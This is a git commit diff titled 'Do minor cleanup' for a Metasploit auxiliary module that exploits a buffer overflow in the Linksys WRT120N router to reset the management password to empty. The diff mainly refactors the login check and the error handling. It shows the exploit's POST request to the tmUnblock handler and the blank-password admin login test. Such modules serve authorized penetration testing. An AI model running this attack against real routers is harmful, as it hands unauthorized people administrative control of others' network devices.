Do minor cleanup
jvazquez-r7
parent
b79197b8ab
commit
582372ec3e
|
|
@ -13,9 +13,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Linksys WRT120N tmUnblock Buffer Overflow',
|
'Name' => 'Linksys WRT120N tmUnblock Buffer Overflow',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a buffer overflow vulnerability in the WRT120N Linksys router.
|
This module exploits a buffer overflow vulnerability in the WRT120N Linksys router
|
||||||
It is possible to reset the password of the management interface temporarily to an
|
to reset the password of the management interface temporarily to an empty value.
|
||||||
empty value. It was tested on a WRT120N firmware version 1.0.07.
|
This module has been tested successfully on a WRT120N device with firmware version
|
||||||
|
1.0.07.
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
|
|
@ -32,33 +33,34 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'DisclosureDate' => 'Feb 19 2014'))
|
'DisclosureDate' => 'Feb 19 2014'))
|
||||||
end
|
end
|
||||||
|
|
||||||
def check_login(user,pass)
|
def check_login(user)
|
||||||
print_status("#{peer} - Trying to login with #{user} and empty password")
|
print_status("#{peer} - Trying to login with #{user} and empty password")
|
||||||
begin
|
res = send_request_cgi({
|
||||||
res = send_request_cgi({
|
'uri' => '/',
|
||||||
'uri' => '/',
|
'method' => 'GET',
|
||||||
'method' => 'GET',
|
'authorization' => basic_auth(user,"")
|
||||||
'authorization' => basic_auth(user,"")
|
})
|
||||||
})
|
if res.nil? || res.code == 404
|
||||||
if res.nil? or res.code == 404
|
print_status("#{peer} - No successful login possible with #{user} and empty password")
|
||||||
print_status("#{peer} - No successful login possible with #{user} and empty password")
|
return false
|
||||||
return false
|
elsif [200, 301, 302].include?(res.code)
|
||||||
end
|
print_good("#{peer} - Successful login #{user} and empty password")
|
||||||
if [200, 301, 302].include?(res.code)
|
return true
|
||||||
print_good("#{peer} - Successful login #{user} and empty password")
|
else
|
||||||
return true
|
print_status("#{peer} - No successful login possible with #{user} and empty password")
|
||||||
else
|
return false
|
||||||
print_status("#{peer} - No successful login possible with #{user} and empty password")
|
|
||||||
return false
|
|
||||||
end
|
|
||||||
rescue ::Rex::ConnectionError
|
|
||||||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
if (check_login("admin","") == true)
|
|
||||||
print_good("#{peer} - login with user admin and no password possible. There is no need to use this module.")
|
begin
|
||||||
|
if check_login("admin")
|
||||||
|
print_good("#{peer} - login with user admin and no password possible. There is no need to use this module.")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
rescue ::Rex::ConnectionError
|
||||||
|
print_error("#{peer} - Failed to connect to the web server")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
@ -87,22 +89,22 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'vars_post' => {
|
'vars_post' => {
|
||||||
'period' => '0',
|
'period' => '0',
|
||||||
'TM_Block_MAC' => '00:01:02:03:04:05',
|
'TM_Block_MAC' => '00:01:02:03:04:05',
|
||||||
'TM_Block_URL' => postdata
|
'TM_Block_URL' => postdata
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
if res and res.code == 500
|
if res and res.code == 500
|
||||||
if (check_login("admin","") == true)
|
if check_login("admin")
|
||||||
print_good("#{peer} - Expected answer and the login was successful. Try to login with the user admin and a blank password")
|
print_good("#{peer} - Expected answer and the login was successful. Try to login with the user admin and a blank password")
|
||||||
else
|
|
||||||
print_status("#{peer} - Expected answer, but unknown exploiting status. Try to login with the user admin and a blank password")
|
|
||||||
end
|
|
||||||
else
|
else
|
||||||
print_error("#{peer} - Unexpected answer. Exploiting attempt has failed")
|
print_status("#{peer} - Expected answer, but unknown exploiting status. Try to login with the user admin and a blank password")
|
||||||
end
|
end
|
||||||
|
else
|
||||||
|
print_error("#{peer} - Unexpected answer. Exploiting attempt has failed")
|
||||||
|
end
|
||||||
rescue ::Rex::ConnectionError
|
rescue ::Rex::ConnectionError
|
||||||
vprint_error("#{peer} - Failed to connect to the web server")
|
print_error("#{peer} - Failed to connect to the web server")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue